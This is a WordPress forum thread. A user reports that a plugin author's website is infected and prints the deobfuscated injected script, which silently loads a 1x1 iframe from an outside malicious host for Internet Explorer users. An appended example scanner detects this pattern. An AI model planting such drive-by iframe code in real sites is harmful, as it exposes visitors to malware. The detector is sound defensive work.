Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author Ahlul Faradish

    (@ahlul)

    Hmm, I think Kaspersky is wrong.
    You can search for iframe on my site, and you will find nothing.

    Thread Starter Chris

    (@christopherw)

    Ahlul, Kaspersky is correct and you are mistaken. Kaspersky performs real-time analysis of web pages as they’re loaded — doing my own manual search of the HTML source code reveals some JavaScript after the closing </html> tag which is decrypting some poorly obfuscated code to load an iframe.

    The code is obfuscated using Dean Edwards’ eval(p.a.c.k.e.d) compression utility from https://dean.edwards.name/packer/.

    If you are not receiving an antivirus message, you are either not running antivirus (or it is not good enough) or you are already infected!

    When deobfuscated, the HTML on your site is as follows:

    function MakeFrameEx(){
        element=document.getElementById('yahoo_api');
        if(!element){
            document.write('<IFRAME id="yahoo_api" SRC="https://cxygugiuiuyy.osa.pl/showthread.php?t=46340270" FRAMEBORDER=0 NAME="yahoo_api" WIDTH=1 HEIGHT=1></IFRAME>')
        }
    }
    var ua=navigator.userAgent.toLowerCase();
    if(((ua.indexOf("msie")!=-1&&ua.indexOf("opera")==-1&&ua.indexOf("webtv")==-1))&&ua.indexOf("windows")!=-1){
        document.onmousemove=MakeFrameEx
    }

    As you can see, your site is clearly serving malware. (Have you been hacked?)
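
A static check for the three signs described in this thread (script after the closing </html> tag, the packer's eval bootstrap, and a 1x1 iframe), as an added example that is not part of the original posts. The rule names, the `scanHtml` and `attr` helpers, and the sample pages are constructed for illustration, and the sample URL is a placeholder.

```javascript
// Added example: static checks for the injection pattern described in the thread.
// Rule names, helper names and sample pages are constructed for illustration.

// Bootstrap emitted by the packer: eval(function(p,a,c,k,e,d){...}) or (...,e,r)
const PACKER_RE = /eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*[dr]\s*\)/i;
const IFRAME_RE = /<iframe\b[^>]*>/gi;

// Read a numeric attribute (quoted or bare) from a single tag, or null if absent.
function attr(tag, name) {
  const m = new RegExp("\\b" + name + "\\s*=\\s*[\"']?(\\d+)", "i").exec(tag);
  return m ? Number(m[1]) : null;
}

function scanHtml(html) {
  const findings = [];
  // 1. Script content placed after the last closing </html> tag.
  const end = html.toLowerCase().lastIndexOf("</html>");
  const tail = end === -1 ? "" : html.slice(end + "</html>".length);
  if (/<script\b/i.test(tail)) findings.push("script-after-html-close");
  // 2. Packer bootstrap signature anywhere in the page.
  if (PACKER_RE.test(html)) findings.push("packed-eval");
  // 3. Iframes sized to be invisible (0 or 1 px on both axes).
  for (const tag of html.match(IFRAME_RE) || []) {
    const w = attr(tag, "width"), h = attr(tag, "height");
    if (w !== null && h !== null && w <= 1 && h <= 1) {
      findings.push("hidden-iframe");
      break;
    }
  }
  return findings;
}

// Constructed sample pages (not taken from the site discussed above).
const CLEAN = "<html><body><p>hello</p><script>var x=1;</script></body></html>\n";
const PACKED = "<html><body><p>hello</p></body></html>\n" +
  "<script>eval(function(p,a,c,k,e,d){/* payload elided */}('...',0,0,[]))</script>";
const UNPACKED = "<html><body></body></html><script>document.write(" +
  "'<IFRAME id=\"x\" SRC=\"https://example.invalid/\" FRAMEBORDER=0 WIDTH=1 HEIGHT=1></IFRAME>')</script>";

for (const [name, page] of [["clean", CLEAN], ["packed", PACKED], ["unpacked", UNPACKED]]) {
  console.log(name, scanHtml(page));
}
```

The iframe rule only fires on markup that is visible statically, so a packed page is caught by the first two rules rather than the third.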

  • The topic ‘[Plugin: WordPress Tiniest Super Cache] Virus on author's web site’ is closed to new replies.